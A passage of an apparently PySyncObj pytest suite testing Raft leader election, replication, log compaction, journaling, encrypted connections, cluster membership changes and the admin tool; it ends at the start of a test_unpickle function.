assert o2._isReady()
assert o3._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._getLeader() == o3._getLeader()
callbackInfo = {
'callback': False
}
o1.addValue(3, callback=partial(onAddValue, info=callbackInfo))
doTicks(objs, 10, stopFunc=lambda: o2.getCounter() == 3 and callbackInfo['callback'] == True)
assert o2.getCounter() == 3
assert callbackInfo['callback'] == True
o1._destroy()
o2._destroy()
o3._destroy()
def removeFiles(files):
for f in (files):
if os.path.isfile(f):
for i in xrange(0, 15):
try:
if os.path.isfile(f):
os.remove(f)
break
else:
break
except:
time.sleep(1.0)
def checkDumpToFile(useFork):
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
removeFiles(dumpFiles)
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[0], useFork=useFork)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[1], useFork=useFork)
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._forceLogCompaction()
o2._forceLogCompaction()
doTicks(objs, 1.5)
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[0], useFork=useFork)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[1], useFork=useFork)
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
def test_checkDumpToFile():
if hasattr(os, 'fork'):
checkDumpToFile(True)
checkDumpToFile(False)
def getRandStr():
return '%0100000x' % random.randrange(16 ** 100000)
def test_checkBigStorage():
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
removeFiles(dumpFiles)
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
# Store ~50Mb data.
testRandStr = getRandStr()
for i in xrange(0, 500):
o1.addKeyValue(i, getRandStr())
o1.addKeyValue('test', testRandStr)
# Wait for replication.
doTicks(objs, 60, stopFunc=lambda: o1.getValue('test') == testRandStr and \
o2.getValue('test') == testRandStr)
assert o1.getValue('test') == testRandStr
o1._forceLogCompaction()
o2._forceLogCompaction()
# Wait for disk dump
doTicks(objs, 8.0)
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.COMPACTION_2, dumpFile=dumpFiles[1])
objs = [o1, o2]
# Wait for disk load, election and replication
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getValue('test') == testRandStr
assert o2.getValue('test') == testRandStr
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
@pytest.mark.skipif(sys.platform == "win32" or platform.python_implementation() != 'CPython', reason="does not run on windows or pypy")
def test_encryptionCorrectPassword():
assert HAS_CRYPTO
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], password='asd')
o2 = TestObj(a[1], [a[0]], password='asd')
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
for conn in list(o1._SyncObj__transport._connections.values()) + list(o2._SyncObj__transport._connections.values()):
conn.disconnect()
o1.addValue(100)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 450 and o2.getCounter() == 450)
assert o1.getCounter() == 450
assert o2.getCounter() == 450
o1._destroy()
o2._destroy()
@pytest.mark.skipif(platform.python_implementation() != 'CPython', reason="does not have crypto on pypy")
def test_encryptionWrongPassword():
assert HAS_CRYPTO
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], password='asd')
o2 = TestObj(a[1], [a[2], a[0]], password='asd')
o3 = TestObj(a[2], [a[0], a[1]], password='qwe')
objs = [o1, o2, o3]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
doTicks(objs, 1.0)
assert o3._getLeader() is None
o1._destroy()
o2._destroy()
o3._destroy()
def _checkSameLeader(objs):
for obj1 in objs:
l1 = obj1._getLeader()
if l1 != obj1._SyncObj__selfNode:
continue
t1 = obj1._getTerm()
for obj2 in objs:
l2 = obj2._getLeader()
if l2 != obj2._SyncObj__selfNode:
continue
if obj2._getTerm() != t1:
continue
if l2 != l1:
obj1._printStatus()
obj2._printStatus()
return False
return True
def _checkSameLeader2(objs):
for obj1 in objs:
l1 = obj1._getLeader()
if l1 is None:
continue
t1 = obj1._getTerm()
for obj2 in objs:
l2 = obj2._getLeader()
if l2 is None:
continue
if obj2._getTerm() != t1:
continue
if l2 != l1:
obj1._printStatus()
obj2._printStatus()
return False
return True
def test_randomTest1():
journalFiles = [getNextJournalFile(), getNextJournalFile(), getNextJournalFile()]
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], TEST_TYPE.RAND_1, journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[2], a[0]], TEST_TYPE.RAND_1, journalFile=journalFiles[1])
o3 = TestObj(a[2], [a[0], a[1]], TEST_TYPE.RAND_1, journalFile=journalFiles[2])
objs = [o1, o2, o3]
st = time.time()
while time.time() - st < 120.0:
doTicks(objs, random.random() * 0.3, interval=0.05)
assert _checkSameLeader(objs)
assert _checkSameLeader2(objs)
for i in xrange(0, random.randint(0, 2)):
random.choice(objs).addValue(random.randint(0, 10))
newObjs = list(objs)
newObjs.pop(random.randint(0, len(newObjs) - 1))
doTicks(newObjs, random.random() * 0.3, interval=0.05)
assert _checkSameLeader(objs)
assert _checkSameLeader2(objs)
for i in xrange(0, random.randint(0, 2)):
random.choice(objs).addValue(random.randint(0, 10))
if not (o1.getCounter() == o2.getCounter() == o3.getCounter()):
print(time.time(), 'counters:', o1.getCounter(), o2.getCounter(), o3.getCounter())
st = time.time()
while not (o1.getCounter() == o2.getCounter() == o3.getCounter()):
doTicks(objs, 2.0, interval=0.05)
if time.time() - st > 30:
break
if not (o1.getCounter() == o2.getCounter() == o3.getCounter()):
o1._printStatus()
o2._printStatus()
o3._printStatus()
print('Logs same:', o1._SyncObj__raftLog == o2._SyncObj__raftLog == o3._SyncObj__raftLog)
print(time.time(), 'counters:', o1.getCounter(), o2.getCounter(), o3.getCounter())
raise AssertionError('Values not equal')
counter = o1.getCounter()
o1._destroy()
o2._destroy()
o3._destroy()
del o1
del o2
del o3
time.sleep(0.1)
o1 = TestObj(a[0], [a[1], a[2]], TEST_TYPE.RAND_1, journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[2], a[0]], TEST_TYPE.RAND_1, journalFile=journalFiles[1])
o3 = TestObj(a[2], [a[0], a[1]], TEST_TYPE.RAND_1, journalFile=journalFiles[2])
objs = [o1, o2, o3]
st = time.time()
while not (o1.getCounter() == o2.getCounter() == o3.getCounter() == counter):
doTicks(objs, 2.0, interval=0.05)
if time.time() - st > 30:
break
if not (o1.getCounter() == o2.getCounter() == o3.getCounter() >= counter):
o1._printStatus()
o2._printStatus()
o3._printStatus()
print('Logs same:', o1._SyncObj__raftLog == o2._SyncObj__raftLog == o3._SyncObj__raftLog)
print(time.time(), 'counters:', o1.getCounter(), o2.getCounter(), o3.getCounter(), counter)
raise AssertionError('Values not equal')
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
# Ensure that raftLog after serialization is the same as in serialized data
def test_logCompactionRegressionTest1():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]])
o2 = TestObj(a[1], [a[0]])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1._forceLogCompaction()
doTicks(objs, 0.5)
assert o1._SyncObj__forceLogCompaction == False
logAfterCompaction = o1._SyncObj__raftLog
o1._SyncObj__loadDumpFile(True)
logAfterDeserialize = o1._SyncObj__raftLog
assert logAfterCompaction == logAfterDeserialize
o1._destroy()
o2._destroy()
def test_logCompactionRegressionTest2():
dumpFiles = [getNextDumpFile(), getNextDumpFile(), getNextDumpFile()]
removeFiles(dumpFiles)
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], dumpFile=dumpFiles[0])
o2 = TestObj(a[1], [a[2], a[0]], dumpFile=dumpFiles[1])
o3 = TestObj(a[2], [a[0], a[1]], dumpFile=dumpFiles[2])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
objs = [o1, o2, o3]
o1.addValue(2)
o1.addValue(3)
doTicks(objs, 10, stopFunc=lambda: o3.getCounter() == 5)
o3._forceLogCompaction()
doTicks(objs, 0.5)
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader() == o3._getLeader()
o3._destroy()
objs = [o1, o2]
o1.addValue(2)
o1.addValue(3)
doTicks(objs, 0.5)
o1._forceLogCompaction()
o2._forceLogCompaction()
doTicks(objs, 0.5)
o3 = TestObj(a[2], [a[0], a[1]], dumpFile=dumpFiles[2])
objs = [o1, o2, o3]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
o1._destroy()
o2._destroy()
o3._destroy()
removeFiles(dumpFiles)
def __checkParnerNodeExists(obj, nodeAddr, shouldExist=True):
nodeAddrSet = {node.address for node in obj._SyncObj__otherNodes}
return (
nodeAddr in nodeAddrSet) == shouldExist # either nodeAddr is in nodeAddrSet and shouldExist is True, or nodeAddr isn't in the set and shouldExist is False
def test_doChangeClusterUT1():
dumpFiles = [getNextDumpFile()]
removeFiles(dumpFiles)
baseAddr = getNextAddr()
oterAddr = getNextAddr()
o1 = TestObj(baseAddr, ['localhost:1235', oterAddr], dumpFile=dumpFiles[0], dynamicMembershipChange=True)
__checkParnerNodeExists(o1, 'localhost:1238', False)
__checkParnerNodeExists(o1, 'localhost:1239', False)
__checkParnerNodeExists(o1, 'localhost:1235', True)
noop = _bchr(_COMMAND_TYPE.NO_OP)
member = _bchr(_COMMAND_TYPE.MEMBERSHIP)
# Check regular configuration change - adding
o1._SyncObj__onMessageReceived(TCPNode('localhost:12345'), {
'type': 'append_entries',
'term': 1,
'prevLogIdx': 1,
'prevLogTerm': 0,
'commit_index': 2,
'entries': [(noop, 2, 1), (noop, 3, 1), (member + pickle.dumps(['add', 'localhost:1238']), 4, 1)]
})
__checkParnerNodeExists(o1, 'localhost:1238', True)
__checkParnerNodeExists(o1, 'localhost:1239', False)
# Check rollback adding
o1._SyncObj__onMessageReceived(TCPNode('localhost:1236'), {
'type': 'append_entries',
'term': 2,
'prevLogIdx': 2,
'prevLogTerm': 1,
'commit_index': 3,
'entries': [(noop, 3, 2), (member + pickle.dumps(['add', 'localhost:1239']), 4, 2)]
})
__checkParnerNodeExists(o1, 'localhost:1238', False)
__checkParnerNodeExists(o1, 'localhost:1239', True)
__checkParnerNodeExists(o1, oterAddr, True)
# Check regular configuration change - removing
o1._SyncObj__onMessageReceived(TCPNode('localhost:1236'), {
'type': 'append_entries',
'term': 2,
'prevLogIdx': 4,
'prevLogTerm': 2,
'commit_index': 4,
'entries': [(member + pickle.dumps(['rem', 'localhost:1235']), 5, 2)]
})
__checkParnerNodeExists(o1, 'localhost:1238', False)
__checkParnerNodeExists(o1, 'localhost:1239', True)
__checkParnerNodeExists(o1, 'localhost:1235', False)
# Check log compaction
o1._forceLogCompaction()
doTicks([o1], 0.5)
o1._destroy()
o2 = TestObj(oterAddr, [baseAddr, 'localhost:1236'], dumpFile='dump1.bin', dynamicMembershipChange=True)
doTicks([o2], 0.5)
__checkParnerNodeExists(o2, oterAddr, False)
__checkParnerNodeExists(o2, baseAddr, True)
__checkParnerNodeExists(o2, 'localhost:1238', False)
__checkParnerNodeExists(o2, 'localhost:1239', True)
__checkParnerNodeExists(o2, 'localhost:1235', False)
o2._destroy()
removeFiles(dumpFiles)
def test_doChangeClusterUT2():
a = [getNextAddr(), getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], dynamicMembershipChange=True)
o2 = TestObj(a[1], [a[2], a[0]], dynamicMembershipChange=True)
o3 = TestObj(a[2], [a[0], a[1]], dynamicMembershipChange=True)
doTicks([o1, o2, o3], 10, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady() == o2._isReady() == o3._isReady() == True
o3.addValue(50)
o2.addNodeToCluster(a[3])
success = False
for i in xrange(10):
doTicks([o1, o2, o3], 0.5)
res = True
res &= __checkParnerNodeExists(o1, a[3], True)
res &= __checkParnerNodeExists(o2, a[3], True)
res &= __checkParnerNodeExists(o3, a[3], True)
if res:
success = True
break
o2.addNodeToCluster(a[3])
assert success
o4 = TestObj(a[3], [a[0], a[1], a[2]], dynamicMembershipChange=True)
doTicks([o1, o2, o3, o4], 10, stopFunc=lambda: o4._isReady())
o1.addValue(450)
doTicks([o1, o2, o3, o4], 10, stopFunc=lambda: o4.getCounter() == 500)
assert o4.getCounter() == 500
o1._destroy()
o2._destroy()
o3._destroy()
o4._destroy()
def test_journalTest1():
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
journalFiles = [getNextJournalFile(), getNextJournalFile()]
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and \
o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
o1.addValue(100)
o2.addValue(150)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 600 and o2.getCounter() == 600)
assert o1.getCounter() == 600
assert o2.getCounter() == 600
o1._forceLogCompaction()
o2._forceLogCompaction()
doTicks(objs, 0.5)
o1.addValue(150)
o2.addValue(150)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 900 and o2.getCounter() == 900)
assert o1.getCounter() == 900
assert o2.getCounter() == 900
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady() and \
o1.getCounter() == 900 and o2.getCounter() == 900)
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getCounter() == 900
assert o2.getCounter() == 900
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
def test_journalTest2():
journalFiles = [getNextJournalFile()]
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
removeFiles(journalFiles)
journal = createJournal(journalFiles[0])
journal.add(b'cmd1', 1, 0)
journal.add(b'cmd2', 2, 0)
journal.add(b'cmd3', 3, 0)
journal._destroy()
journal = createJournal(journalFiles[0])
assert len(journal) == 3
assert journal[0] == (b'cmd1', 1, 0)
assert journal[-1] == (b'cmd3', 3, 0)
journal.deleteEntriesFrom(2)
journal._destroy()
journal = createJournal(journalFiles[0])
assert len(journal) == 2
assert journal[0] == (b'cmd1', 1, 0)
assert journal[-1] == (b'cmd2', 2, 0)
journal.deleteEntriesTo(1)
journal._destroy()
journal = createJournal(journalFiles[0])
assert len(journal) == 1
assert journal[0] == (b'cmd2', 2, 0)
journal._destroy()
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
def test_applyJournalAfterRestart():
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
journalFiles = [getNextJournalFile(), getNextJournalFile()]
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
o2 = TestObj(a[1], [a[0]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[1], journalFile=journalFiles[1])
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10, stopFunc=lambda: o1.getCounter() == 350 and o2.getCounter() == 350)
assert o1.getCounter() == 350
assert o2.getCounter() == 350
doTicks(objs, 2)
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
o1 = TestObj(a[0], [a[1]], TEST_TYPE.JOURNAL_1, dumpFile=dumpFiles[0], journalFile=journalFiles[0])
objs = [o1]
doTicks(objs, 10, o1.getCounter() == 350)
assert o1.getCounter() == 350
removeFiles(dumpFiles)
removeFiles(journalFiles)
removeFiles([e + '.meta' for e in journalFiles])
def test_autoTick1():
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.AUTO_TICK_1)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.AUTO_TICK_1)
assert not o1._isReady()
assert not o2._isReady()
time.sleep(4.5)
assert o1._isReady()
assert o2._isReady()
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1._isReady()
assert o2._isReady()
o1.addValue(150)
o2.addValue(200)
time.sleep(1.5)
assert o1._isReady()
assert o2._isReady()
assert o1.getCounter() == 350
assert o2.getCounter() == 350
assert o2.addValueSync(10) == 360
assert o1.addValueSync(20) == 380
o1._destroy()
o2._destroy()
time.sleep(0.5)
def test_largeCommands():
dumpFiles = [getNextDumpFile(), getNextDumpFile()]
removeFiles(dumpFiles)
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.LARGE_COMMAND, dumpFile=dumpFiles[0], leaderFallbackTimeout=60.0)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.LARGE_COMMAND, dumpFile=dumpFiles[1], leaderFallbackTimeout=60.0)
objs = [o1, o2]
doTicks(objs, 10, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
# Generate ~20Mb data.
testRandStr = getRandStr()
bigStr = ''
for i in xrange(0, 200):
bigStr += getRandStr()
o1.addKeyValue('big', bigStr)
o1.addKeyValue('test', testRandStr)
# Wait for replication.
doTicks(objs, 60, stopFunc=lambda: o1.getValue('test') == testRandStr and \
o2.getValue('test') == testRandStr and \
o1.getValue('big') == bigStr and \
o2.getValue('big') == bigStr)
assert o1.getValue('test') == testRandStr
assert o2.getValue('big') == bigStr
o1._forceLogCompaction()
o2._forceLogCompaction()
# Wait for disk dump
doTicks(objs, 8.0)
o1._destroy()
o2._destroy()
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], TEST_TYPE.LARGE_COMMAND, dumpFile=dumpFiles[0], leaderFallbackTimeout=60.0)
o2 = TestObj(a[1], [a[0]], TEST_TYPE.LARGE_COMMAND, dumpFile=dumpFiles[1], leaderFallbackTimeout=60.0)
objs = [o1, o2]
# Wait for disk load, election and replication
doTicks(objs, 60, stopFunc=lambda: o1.getValue('test') == testRandStr and \
o2.getValue('test') == testRandStr and \
o1.getValue('big') == bigStr and \
o2.getValue('big') == bigStr and \
o1._isReady() and o2._isReady())
assert o1._getLeader().address in a
assert o1._getLeader() == o2._getLeader()
assert o1.getValue('test') == testRandStr
assert o2.getValue('big') == bigStr
assert o1.getValue('test') == testRandStr
assert o2.getValue('big') == bigStr
o1._destroy()
o2._destroy()
removeFiles(dumpFiles)
@pytest.mark.skipif(platform.python_implementation() != 'CPython', reason="does not have crypto on pypy")
def test_readOnlyNodes():
random.seed(12)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1], a[2]], password='123')
o2 = TestObj(a[1], [a[2], a[0]], password='123')
o3 = TestObj(a[2], [a[0], a[1]], password='123')
objs = [o1, o2, o3]
b1 = TestObj(None, [a[0], a[1], a[2]], password='123')
b2 = TestObj(None, [a[0], a[1], a[2]], password='123')
roObjs = [b1, b2]
doTicks(objs, 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
o1.addValue(150)
o2.addValue(200)
doTicks(objs, 10.0, stopFunc=lambda: o3.getCounter() == 350)
doTicks(objs + roObjs, 4.0, stopFunc=lambda: b1.getCounter() == 350 and b2.getCounter() == 350)
assert b1.getCounter() == b2.getCounter() == 350
assert o1._getLeader() == b1._getLeader() == o2._getLeader() == b2._getLeader()
assert b1._getLeader().address in a
prevLeader = o1._getLeader()
newObjs = [o for o in objs if o._SyncObj__selfNode != prevLeader]
assert len(newObjs) == 2
doTicks(newObjs + roObjs, 10.0, stopFunc=lambda: newObjs[0]._getLeader() != prevLeader and \
newObjs[0]._getLeader() is not None and \
newObjs[0]._getLeader().address in a and \
newObjs[0]._getLeader() == newObjs[1]._getLeader())
assert newObjs[0]._getLeader() != prevLeader
assert newObjs[0]._getLeader().address in a
assert newObjs[0]._getLeader() == newObjs[1]._getLeader()
newObjs[1].addValue(50)
doTicks(newObjs + roObjs, 10.0, stopFunc=lambda: newObjs[0].getCounter() == 400 and b1.getCounter() == 400)
o1._printStatus()
o2._printStatus()
o3._printStatus()
b1._printStatus()
assert newObjs[0].getCounter() == 400
assert b1.getCounter() == 400
doTicks(objs + roObjs, 10.0,
stopFunc=lambda: sum([int(o.getCounter() == 400) for o in objs + roObjs]) == len(objs + roObjs))
for o in objs + roObjs:
assert o.getCounter() == 400
currRes = {}
def onAdd(res, err):
currRes[0] = err
b1.addValue(50, callback=onAdd)
doTicks(objs + roObjs, 5.0, stopFunc=lambda: o1.getCounter() == 450 and \
b1.getCounter() == 450 and \
b2.getCounter() == 450 and
currRes.get(0) == FAIL_REASON.SUCCESS)
assert o1.getCounter() == 450
assert b1.getCounter() == 450
assert b2.getCounter() == 450
assert currRes.get(0) == FAIL_REASON.SUCCESS
# check that all objects have 2 readonly nodes
assert all(map(lambda o: o.getStatus()['readonly_nodes_count'] == 2, objs))
# disconnect readonly node
b1._destroy()
doTicks(objs, 2.0)
assert all(map(lambda o: o.getStatus()['readonly_nodes_count'] == 1, objs))
o1._destroy()
o2._destroy()
o3._destroy()
b1._destroy()
b2._destroy()
@pytest.mark.skipif(platform.python_implementation() != 'CPython', reason="does not have crypto on pypy")
def test_syncobjAdminStatus():
assert HAS_CRYPTO
random.seed(42)
a = [getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], password='123')
o2 = TestObj(a[1], [a[0]], password='123')
assert not o1._isReady()
assert not o2._isReady()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
status1 = o1.getStatus()
status2 = o2.getStatus()
assert 'version' in status1
assert 'log_len' in status2
trueRes = {
o1: '\n'.join('%s: %s' % (k, v) for k, v in sorted(status1.items())),
o2: '\n'.join('%s: %s' % (k, v) for k, v in sorted(status2.items())),
}
currRes = {
}
args = {
o1: ['-conn', a[0], '-pass', '123', '-status'],
o2: ['-conn', a[1], '-pass', '123', '-status'],
}
doSyncObjAdminTicks([o1, o2], args, 10.0, currRes,
stopFunc=lambda: currRes.get(o1) is not None and currRes.get(o2) is not None)
assert len(currRes[o1]) == len(trueRes[o1])
assert len(currRes[o2]) == len(trueRes[o2])
o1._destroy()
o2._destroy()
def test_syncobjAdminAddRemove():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], dynamicMembershipChange=True)
o2 = TestObj(a[1], [a[0]], dynamicMembershipChange=True)
assert not o1._isReady()
assert not o2._isReady()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
trueRes = 'SUCCESS ADD ' + a[2]
currRes = {}
args = {
o1: ['-conn', a[0], '-add', a[2]],
}
doSyncObjAdminTicks([o1, o2], args, 10.0, currRes, stopFunc=lambda: currRes.get(o1) is not None)
assert currRes[o1] == trueRes
o3 = TestObj(a[2], [a[1], a[0]], dynamicMembershipChange=True)
doTicks([o1, o2, o3], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady() and o3._isReady())
assert o1._isReady()
assert o2._isReady()
assert o3._isReady()
trueRes = 'SUCCESS REMOVE ' + a[2]
args[o1] = None
args[o2] = ['-conn', a[1], '-remove', a[2]]
doSyncObjAdminTicks([o1, o2, o3], args, 10.0, currRes, stopFunc=lambda: currRes.get(o2) is not None)
assert currRes[o2] == trueRes
o3._destroy()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
o1._destroy()
o2._destroy()
def test_syncobjAdminSetVersion():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], dynamicMembershipChange=True)
o2 = TestObj(a[1], [a[0]], dynamicMembershipChange=True)
assert not o1._isReady()
assert not o2._isReady()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1._isReady() and o2._isReady())
assert o1._isReady()
assert o2._isReady()
assert o1.getCodeVersion() == 0
assert o2.getCodeVersion() == 0
o2.testMethod()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1.getValue('testKey') == 'valueVer1' and \
o2.getValue('testKey') == 'valueVer1')
assert o1.getValue('testKey') == 'valueVer1'
assert o2.getValue('testKey') == 'valueVer1'
trueRes = 'SUCCESS SET_VERSION 1'
currRes = {}
args = {
o1: ['-conn', a[0], '-set_version', '1'],
}
doSyncObjAdminTicks([o1, o2], args, 10.0, currRes, stopFunc=lambda: currRes.get(o1) is not None)
assert currRes[o1] == trueRes
doTicks([o1, o2], 10.0, stopFunc=lambda: o1.getCodeVersion() == 1 and o2.getCodeVersion() == 1)
assert o1.getCodeVersion() == 1
assert o2.getCodeVersion() == 1
o2.testMethod()
doTicks([o1, o2], 10.0, stopFunc=lambda: o1.getValue('testKey') == 'valueVer2' and \
o2.getValue('testKey') == 'valueVer2')
assert o1.getValue('testKey') == 'valueVer2'
assert o2.getValue('testKey') == 'valueVer2'
o1._destroy()
o2._destroy()
@pytest.mark.skipif(os.name == 'nt', reason='temporary disabled for windows')
def test_syncobjWaitBinded():
random.seed(42)
a = [getNextAddr(), getNextAddr(), getNextAddr()]
o1 = TestObj(a[0], [a[1]], testType=TEST_TYPE.WAIT_BIND)
o2 = TestObj(a[1], [a[0]], testType=TEST_TYPE.WAIT_BIND)
o1.waitBinded()
o2.waitBinded()
o3 = TestObj(a[1], [a[0]], testType=TEST_TYPE.WAIT_BIND)
with pytest.raises(SyncObjException):
o3.waitBinded()
o1.destroy()
o2.destroy()
o3.destroy()
@pytest.mark.skipif(os.name == 'nt', reason='temporary disabled for windows')
def test_unpickle():
